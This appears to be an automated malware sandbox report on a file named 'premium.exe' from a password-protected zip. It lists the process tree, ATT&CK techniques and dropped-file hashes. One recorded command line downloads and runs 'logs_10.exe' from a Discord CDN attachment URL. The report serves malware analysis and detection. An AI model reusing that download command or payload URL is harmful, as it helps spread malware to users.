  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
  2⤵
  PID:252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
  2⤵
  PID:3448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
  2⤵
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6308 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1
  2⤵
  PID:1688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
  2⤵
  PID:4644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
  2⤵
  PID:3364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
  2⤵
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:1
  2⤵
  PID:3436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:1
  2⤵
  PID:544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6292 /prefetch:8
  2⤵
  PID:5016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3516 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1616

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3896

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1560

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4772

C:\Users\Admin\AppData\Local\Temp\Temp1_pass 123 premium.zip\premium.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_pass 123 premium.zip\premium.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:1176
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5743.tmp\5744.tmp\5745.bat "C:\Users\Admin\AppData\Local\Temp\Temp1_pass 123 premium.zip\premium.exe""
  2⤵
  PID:3500
- - C:\Users\Admin\AppData\Local\Temp\5743.tmp\5744.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\5743.tmp\5744.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/459407711352913922/841307806405099540/logs_10.exe" "logs_10.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4620
- - C:\Users\Admin\AppData\Local\Temp\5743.tmp\5744.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\5743.tmp\5744.tmp\extd.exe "" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e1544690d41d950f9c1358068301cfb5

SHA1
ae3ff81363fcbe33c419e49cabef61fb6837bffa

SHA256
53d69c9cc3c8aaf2c8b58ea6a2aa47c49c9ec11167dd9414cd9f4192f9978724

SHA512
1e4f1fe2877f4f947d33490e65898752488e48de34d61e197e4448127d6b1926888de80b62349d5a88b96140eed0a5b952ef4dd7ca318689f76e12630c9029da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9314124f4f0ad9f845a0d7906fd8dfd8

SHA1
0d4f67fb1a11453551514f230941bdd7ef95693c

SHA256
cbd58fa358e4b1851c3da2d279023c29eba66fb4d438c6e87e7ce5169ffb910e

SHA512
87b9060ca4942974bd8f95b8998df7b2702a3f4aba88c53b2e3423a532a75407070368f813a5bbc0251864b4eae47e015274a839999514386d23c8a526d05d85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

Filesize
214KB

MD5
ba958dfa97ba4abe328dce19c50cd19c

SHA1
122405a9536dd824adcc446c3f0f3a971c94f1b1

SHA256
3124365e9e20791892ee21f47763d3df116763da0270796ca42fd63ecc23c607

SHA512
aad22e93babe3255a7e78d9a9e24c1cda167d449e5383bb740125445e7c7ddd8df53a0e53705f4262a49a307dc54ceb40c66bab61bec206fbe59918110af70bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
38ef8ecb53b8a177cbd0f5f883e1921a

SHA1
a02eef74d243267ecc6c8edd5d156e9ebf399a99

SHA256
fcbcdb0e7a4c20049f8a3a7911ad7c38535a583b8b2057f2405782a05e384dd8

SHA512
f25c8832580655393a6e94c6958300b0bf6c07cf738473ae315eb2551432854c43c81eeb1351fb6fe0fc60df7d0cc3505f24f7319ccf92ce21e39ed1f9118f08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
36256a650d67da76b7ef7142e2d495cb

SHA1
0b8b472dd59a2f7a9eba9993de94726282f9d35e

SHA256
f3e3cdc38079d40872c9e728b616ae9f2185a4cbd6e33b71bf050c52dfc60f4e

SHA512
0ac2179604b2659383a5d28f1b9ee7fb326c2bcd96090fec9a8f488d21e3c6e5a2603d184f37521d100c41d722f60dd57ef39f919bf343dfbaa63e2322b3f5d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
5KB

MD5
179ea4ff0e945bd943b7a1fca20039ed

SHA1
262cad29eb4033132bbfcc92147c975b76cebd62

SHA256
f694d66a6aba34bcaa763e0a3056a09a00ab9fc098d4a1f5c4cda3ac791a9e9d

SHA512
9605483d3c05055e0462097642cf2941daf7b7559d8e5d47a584c661746122fa7b04edcca9a94fdd281bf7114173c83d0864f575cc36dbcddd8bdce2ea0024eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
5bac1ad438c3b4c7b4788190d1040d33

SHA1
75ef55d3aca38a811ee2e565c697657f3e1d0cde

SHA256
f32793b55f10a9f1a7e87b5e53ba8b6f7c7a7acbc55ea4223b80d464a514af9c

SHA512
411a7b9c27c7d181e741da5d8d7aead5be70b598900f9ebb6a844e4bb692ae508932e0889a81d7a720eeab30e25e3bd7e8dd49e34707beccd5d2cb78afa1e22b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
cb63176a686e374d5dc26afcf6db76a2

SHA1
55965b55c19e961c1ac3d0ec57aa8f85be803be7

SHA256
136eedb4f7bdd6788afb8256b7fc5b4ee4302b07e8fb8205abed204b677d8b3a

SHA512
d3c8e5bfe683e8c7df4124723263aa77813aa4c13a4a5421d990432204f9bf6fd265a987aad345b621560cebb2e3e3c4828e6e158199414b67993862c8aea74d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
45e894a35c10d63d3fed9fcb6d5019fd

SHA1
6e0cc6f04eb3e303aa2a0e1ee3f66a03ab032f5c

SHA256
3032945bc2ca717eb463b2fc469155fc3c118c8c1159868e574b2148c4252c27

SHA512
1620a1b58e241d405f5967e7a3d270203b52b5aab5e3a5a3f587ed697150c7e2e5c8cae92104d966011ce4e3e3b1fd794b5ced0c8254267087e106ee37dd4add

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
66bc931af121687e17de11ac75f1f8c3

SHA1
857745e173f2602850d783aab032b298d3ea6f79

SHA256
090b93f2751a385cba47bdcfd44973e4a98b01274b76292cbc6cad4901e7e695

SHA512
9117a3e5cdbcb69d651ef5fd7b757152631036bb8daefa75c0d7ff85fc1eb5fccf741145bae8783cdd7794c7a3dc1468b08d03bc235dd0bb36764ae125b6af5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
83b4f28fe719765b5aa4b97a4c174c44

SHA1
0e7fef2d46215b519149d5137be7e89b713d0c83

SHA256
1a89a05c1fd63af72b0bce3f10bfe906daf3a86839d1ce77d69072c14dc0a50d

SHA512
f8f1c91c97d4b1b7936751b581bc21927efdcc7be25c6ac660e5d9043ac8d8368480f40c41b0f7981563249d8fe5bf9d191ef25c3e58b56cea6c113945c68921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b60a4625c35999f107174875042070b5

SHA1
aeef8affd74ca692ce7805d6170742f184f6e81a

SHA256
25853935b6e4d93c1bf4a783a7de964b5cd725910f28adfd33aabf5bb0763451

SHA512
4fc65df9b22c4b0bd8b49febb502be7a58133c0b43f4e624557fde3df3ee328041b0205bedf814c79df69e7d1302ed501c37894c0a4a75e59b959ddd8dfb8e9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
c3d3c31b2ce31a222f87065b01c1d506

SHA1
c41b6740124ca78241927b0b9be2960c6774f658

SHA256
ae5666c0f3f8beb69394b5e03e35d9028318695c52aef9a8c6d5eb9e8794adac

SHA512
79122931927215d482b43d4a8dc619f1d6b081207211d7abb0895706fddf477d2d25fee26bb8f63f6f5b016e0bbf63f911db1ba614e8c039e3b9723cbc355db8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58e896.TMP

Filesize
48B

MD5
b9576e127b3945488496fa419647ee5a

SHA1
cd240ccdff9164ede3777aa681381cf41799f01b

SHA256
39885d71eed31187ffdc47f9a15b2212fdcfc292c263e53e8563d3b3922f966d

SHA512
0764b313cd36591e8720dc7009c9cc0809f8ef3ff2f3b3afed563cb080097cf401ca580df36e7bac1303cbb5a57202c0c799bd4b7565fae6676157caeafdb5cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
afcdc54b8920b6e7b893dbb3a5b11d4c

SHA1
bb184e42b09bcd3e1ed8b94f660e803803cb6ce2

SHA256
1ad71d32df7e49670d36293771343dbec1edb899fdb0a97fce9cd616dbb7f993

SHA512
e8c1f1ce8a38272f5c2f2c5ab5eaea8a0469e18bbda5a5248baf1ee3a6f15fd3e075501b0b8a1990e79a9afd04c92848ed2bcdae17b5e713f8eaac70a711697d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58af27.TMP

Filesize
1KB

MD5
ecabbefdeda18e3a19a0cee5cf59a007

SHA1
3c38aece06908fdf0a41e1631796be2e6b03537d

SHA256
065ece61d43faa89874bb6acbdafdc21aa598681819406da54402d6e141763ca

SHA512
fc7ad602d5a6b02855283e2151233e02d14d0bde30207b87cb57ff3e4e72bb7087a03cd2f6546c65f5fa7d53459c2a20202bb4f9f486b34178ce7304508774fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8f6e273db9ec9f02c212a1330a4fdfb2

SHA1
d71270e5034124ba353ed3b9dda29102f8c65b03

SHA256
530502b5a1489df65f5ee99ce5a014412197b910cc8cca1947275b9c3303d5a9

SHA512
f477483367116873f27be2886243f24720d5538d2ba9b932185d17e13f54abc2e58dcaeb936845425f21213f7a59fa34798af4166f29e457e401c25224316437

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
b274d0ab9423a32947e3981628aa005f

SHA1
7089224308602fe68af2f8b90f659d6441a8ec10

SHA256
b0e67fece86972c9c12ca2afb81f9ed3c499a43021c75bab83b2c48f17b9eb2f

SHA512
2d4b4f9237e23a9c8c3af3e27c16dd2706a45f7cab2779be5a59cf026cc35f81cc2f86a0e43a84fead72bf345c1c2af3938bccb46500d3d3fbdc7a45184c0e55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
50ad919ce07950e49a6a087736648865

SHA1
178d20fd73ad8f9eb4b54498de944d86666750a1

SHA256
95528d82ee8e71fcc08ea2e6c2244a9030339e021bc067e60dccee7c347678df

SHA512
cea191423a97d3c0cfd65deaa34417c8cbfa57a6c953b90dce50e7726d6132cfe587a5eb94ccdbcbeabf47abdcb1d7757a6533a829df985e322ed398d59a51ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
85e8df37b56e902a625b57342d9406cf

SHA1
01ab7a6b9e4e140d4353e3804888572fd717f33d

SHA256
6b48ad33fd372bd97f079ea87c509f0bd4e6abe7597437659332abb5b770fa2b

SHA512
edcdbc2b20dd34c62ed03f52be49bc9f486b869bc6312d2a4d76ef275dea270ff9c5d65ff60ca93a09a3f8b89c557ab4d010adb91ccaf85bd7397f6279acbc5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\B4170MAY\premium[1].exe

Filesize
355KB

MD5
efa94129f336a8b137c1ecfa8a0edbef

SHA1
1955c555ce6d4bb09a83db99ee5b2f4cf67244c3

SHA256
211b08bde528765cea92b88811d9e06b771c2ad075651da050c91b4720eee823

SHA512
b91b5892f16010a285cd1d6eca29eb80cc5049d31bd978585b87603069ca6cf2ed48084f40d6d1af7f0d87d72b506130d7406150b7eb9e4d08f42f7c2742bb6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\19284\logs_10.exe

Filesize
36B

MD5
a1ca4bebcd03fafbe2b06a46a694e29a

SHA1
ffc88125007c23ff6711147a12f9bba9c3d197ed

SHA256
c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

SHA512
6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\5743.tmp\5744.tmp\5745.bat

Filesize
723B

MD5
fad4a5947087cf1e1245b641ce8346ef

SHA1
233b412824aae5c2c80fc3df3675f9cea0b6d844

SHA256
4be5dce8e56dc18b2ba72c4d90cdbed8fa13f17172621a65d3b49e1c3856f741

SHA512
dc2b864a655df5c910696adc65096e993e9ff3e8d2431c929fbacc2e1e2590920ca807c99030ab9abaf4c5d66acb6663a8e7c3e15ed2272069bb5d7c7756e92c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5743.tmp\5744.tmp\extd.exe

Filesize
259KB

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 608544.crdownload

Filesize
313KB

MD5
79aa46c3867a6a58bd58ae210c325dc1

SHA1
be8ecad7da18ba95f4ef9f03eb3e093127a95671

SHA256
4cb490771e18b098c663c2b5b14a05808abd359c6c2b72eefecc0622e15b191e

SHA512
d6c48a4551122879b4c58f315afd6a0c4d59f9042217c685fe9d395e8c6a7c4a254ff794ad6ad85642750fa000bb37e26df55792e4042246b7b2378375162d3f

Download Submit
C:\Users\Admin\Downloads\pass 123 premium.zip:Zone.Identifier

Filesize
186B

MD5
65753d261c813e3245bf038ad39a20e7

SHA1
b22726f5d028ffed0b0b74ae08948664f4e792b0

SHA256
f7521232707c45a407b04b808cdfddf4de9077816550db0cc5c6acd49928a7e4

SHA512
41ed98895ec051ff4b8bacb6a183bb592a8e10f924dbeffeeac11074bd6099a913cea5e39c35ac198612bd9463be96337a7dfdf73d7a44ff1892586b1636efaf

Download Submit
memory/1044-180-0x0000000000400000-0x00000000004A5000-memory.dmp

Filesize
660KB

Download
memory/4620-171-0x0000000000400000-0x00000000004A5000-memory.dmp

Filesize
660KB

Download
memory/4620-169-0x0000000000400000-0x00000000004A5000-memory.dmp

Filesize
660KB

Download